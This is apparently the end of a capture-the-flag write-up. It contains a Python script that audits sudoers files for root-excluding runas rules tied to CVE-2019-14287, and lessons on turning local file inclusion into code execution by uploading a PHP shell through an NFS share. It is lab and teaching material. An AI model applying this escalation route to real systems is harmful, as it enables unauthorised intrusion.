Aarti Singh: https://www.linkedin.com/in/aarti-singh-353698114/


+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+
_______________________
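As an added example, not from the post, here is a Python sudoers audit that flags runas lists which allow ALL but exclude root, the pattern behind this escalation. The sudoers excerpt is constructed (the mahakaal line is the sudoers form of the sudo -l output above), and the sudo version string is an assumption, since the post never prints it.

```python
import re

# Constructed /etc/sudoers excerpt. The mahakaal line is the sudoers form of the
# "(ALL, !root) /usr/bin/watch" entry that sudo -l printed on the machine.
SUDOERS = """\
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
mahakaal ALL=(ALL, !root) /usr/bin/watch
backup  ALL=(ALL, !root, !#0) NOPASSWD: /usr/bin/rsync
deploy  ALL=(www-data) /usr/bin/systemctl restart apache2
"""

RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<hosts>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$')


def parse_rules(text):
    """Return (user, runas_users, commands) for each user-specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_users = m.group("runas").split(":", 1)[0]      # drop any ":group" part
        runas = [u.strip() for u in runas_users.split(",") if u.strip()]
        rules.append((m.group("who"), runas, m.group("cmds").strip()))
    return rules


def version_tuple(version):
    """'1.8.21p2' -> (1, 8, 21); the patch suffix does not matter for this check."""
    return tuple(int(x) for x in re.findall(r"\d+", version)[:3])


def audit(text, sudo_version):
    """Flag rules that rely on excluding root from an ALL runas list. Before sudo
    1.8.28 (CVE-2019-14287) the exclusion can be bypassed; even on fixed versions a
    positive list of target users is the safer rule, so the finding stays as info."""
    fixed = version_tuple(sudo_version) >= (1, 8, 28)
    findings = []
    for who, runas, cmds in parse_rules(text):
        negated = [u for u in runas if u.startswith("!")]
        if "ALL" in runas and negated:
            findings.append({"user": who, "runas": runas, "cmds": cmds,
                             "severity": "info" if fixed else "high",
                             "fix": f"{who} ALL=(<explicit target users>) {cmds}"})
    return findings


if __name__ == "__main__":
    for f in audit(SUDOERS, "1.8.21p2"):    # assumed version string, not from the post
        print(f"[{f['severity']}] {f['user']} runas={f['runas']} -> suggested: {f['fix']}")
```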

Lessons Learned

  1. After enumeration revealed a local file inclusion vulnerability on the target, and once the classic approaches (reading SSH private key files and log files) had failed and remote file inclusion had been ruled out, one should think of other routes for getting a file onto the host, such as the NFS share on this machine, to upload a shell file.

  2. Remember to change the permissions of shell.php, otherwise execution fails.

Posted 2023-03-15 11:26 by Jason_huawen